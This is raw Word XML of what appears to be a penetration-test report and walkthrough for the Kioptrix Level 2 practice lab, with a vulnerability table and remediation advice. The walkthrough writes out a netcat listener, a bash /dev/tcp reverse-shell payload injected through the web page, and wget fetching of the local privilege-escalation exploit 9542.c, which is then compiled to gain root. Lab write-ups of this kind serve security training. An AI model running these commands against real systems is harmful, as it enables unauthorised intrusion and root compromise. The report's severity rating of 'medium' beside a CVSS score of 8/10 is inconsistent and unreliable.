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320"/>
        <w:tblW w:w="11680" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2434"/>
        <w:gridCol w:w="9246"/>
      </w:tblGrid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Describe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Vulnerability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Services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http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14AC6" w:rsidRPr="00B14AC6" w:rsidTr="007B6D52">
        <w:trPr>
          <w:trHeight w:val="59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Port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80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Versions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4.5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severity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medium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Cve I’d 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N/A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Cvss score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8/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14AC6" w:rsidRPr="00B14AC6" w:rsidTr="007B6D52">
        <w:trPr>
          <w:trHeight w:val="59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Remediations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1. Outdated Software Components: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Vulnerability: The system runs older versions of services such as OpenSSH 3.9p1 and Apache 2.0.52, which contain known vulnerabilities.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Regular Updates: Implement a patch management process to ensure all software components are updated to their latest stable versions, addressing known security flaws.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2. Weak SSH Configuration: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Vulnerability: The SSH service supports both SSH protocol versions 1.99 and 2.0.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Protocol Enforcement: Configure the SSH service to accept only the more secure SSH protocol version 2.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Strong Authentication: Enforce the use of strong, unique passwords and consider implementing key-based authentication to enhance security.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3. Web Application Vulnerabilities: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Vulnerability: The web application hosted on the server is susceptible to SQL injection attacks, allowing unauthorized access to the backend database.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>Input Validation: Implement robust input validation to ensure that user-supplied data is properly sanitized before processing.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Use of Prepared Statements: Utilize prepared statements with parameterized queries to prevent SQL injection vulnerabilities.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4. Command Injection Vulnerabilities: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Vulnerability: Certain functionalities within the web application are vulnerable to command injection, allowing attackers to execute arbitrary commands on the server.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Command Handling: Avoid using user input directly in system commands. Employ safer alternatives or ensure proper sanitization of inputs.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>Least Privilege Principle: Run applications with the minimum privileges necessary to limit the potential impact of a successful exploit.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5. Insecure Network Services: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Vulnerability: Services like RPC (port 111) and CUPS (port 631) are exposed, which could be exploited by attackers.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Remediation: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Service Hardening: Disable unnecessary services and ensure that essential services are securely configured.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Firewall Implementation: Deploy firewalls to restrict access to critical services based on IP addresses and ports.</w:t>
            </w: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Step 1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B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>First</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I find my ip in kali linix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>
                  <wp:extent cx="5730240" cy="1737360"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="104478207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now I do netdiscover for getting victim ip add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5730240" cy="1165860"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="157113720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I get as you see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Now I do nmap for getting open ports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5730240" cy="2209800"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="17814304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 xml:space="preserve">Lot of ports are open as you see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Step 2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Port no 80 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> 443 open lets see website now how its look like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5730240" cy="1531620"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="40219288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Here is how its looks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Now I try “OS” command for seeking some informations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 xml:space="preserve"> </w:t>
            </w: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3268980" cy="2042160"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:docPr id="99009187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As we see OS command execute easily </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>now</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I use reverse shell payload for getting privileges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But first I use nc for listening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Step 3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nc -lvnp 5430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| bash -i &gt;&amp; /dev/tcp/192.168.1.105/5430 0&gt;&amp;1 (for reverse shell payload)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>
                  <wp:extent cx="5730240" cy="2156460"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="30907372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As you see listening are on now and I get reverse connection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B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>First</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I find the os version of machine after that I make payload with the help of Metasploit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5730240" cy="1958340"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
                  <wp:docPr id="189045384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4AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">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As you see I get centos Version 4.5 now I find vulnerability in Metasploit having or not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>
                  <wp:extent cx="5730240" cy="2202180"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
                  <wp:docPr id="13312976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As you see I get exploit of centos 4.5 now I mirror and save that file in my linux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Searchsploit -m linux_x86/local/9542.c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After doing this cmd that file get mirror and save in my kali linux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Step 4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Now I start my python server to import that file in reverse connetion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>
                  <wp:extent cx="5730240" cy="1821180"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
                  <wp:docPr id="39031857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 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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5730240" cy="1775460"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="946166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For importing that file in this vuln machine I use ‘wget cmd’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B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>“ Wget</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="00B14AC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="40"/>
                  <w:szCs w:val="40"/>
                </w:rPr>
                <w:t>http://192.168.1.105:8080/9542.c</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> “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 xml:space="preserve">As you see that file uploaded successfully </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>now</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I use gcc cmd for compiling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>
                  <wp:extent cx="5730240" cy="1661160"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="84936485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Gcc -o crack 9542.c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B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>crack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And done I get root acces as you see</w:t>
            </w:r>
          </w:p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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14AC6" w:rsidRPr="00B14AC6" w:rsidTr="007B6D52">
        <w:trPr>
          <w:trHeight w:val="564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lastRenderedPageBreak/>
              <w:t xml:space="preserve">References </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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AC6" w:rsidRPr="00B14AC6" w:rsidRDefault="00B14AC6" w:rsidP="007B6D52">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B14AC6">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>https://ethicalhackers.club/kioptrix-level-2-vulnhub-complete-walkthrough-guide/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B14AC6" w:rsidRPr="00B14AC6" w:rsidRDefault="00B14AC6" w:rsidP="00B14AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C26CDE" w:rsidRPr="00B14AC6" w:rsidRDefault="007B6D5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CSV :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="007B6D52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>..\</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="007B6D52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>Kioptrix..</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="007B6D52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>lvl.2.csv</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00C26CDE" w:rsidRPr="00B14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AC6"/>
    <w:rsid w:val="00091E08"/>
    <w:rsid w:val="000C6BC5"/>
    <w:rsid w:val="00310988"/>
    <w:rsid w:val="0040179C"/>
    <w:rsid w:val="005C6B18"/>
    <w:rsid w:val="006F6CC4"/>
    <w:rsid w:val="007B6D52"/>
    <w:rsid w:val="007E2FBE"/>
    <w:rsid w:val="00997CCB"/>
    <w:rsid w:val="00B14AC6"/>
    <w:rsid w:val="00BE463B"/>
    <w:rsid w:val="00C2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8039"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ADD030C9-77E2-42C6-BC9E-7E926E8D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A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A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A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A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A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A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A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A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A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A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A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A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A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AC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14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4A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A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20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../Kioptrix..lvl.2.csv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92.168.1.105:8080/9542.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561</Words>
  <Characters>3201</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>26</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop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dcterms:created xsi:type="dcterms:W3CDTF">2025-03-22T07:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-15T15:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>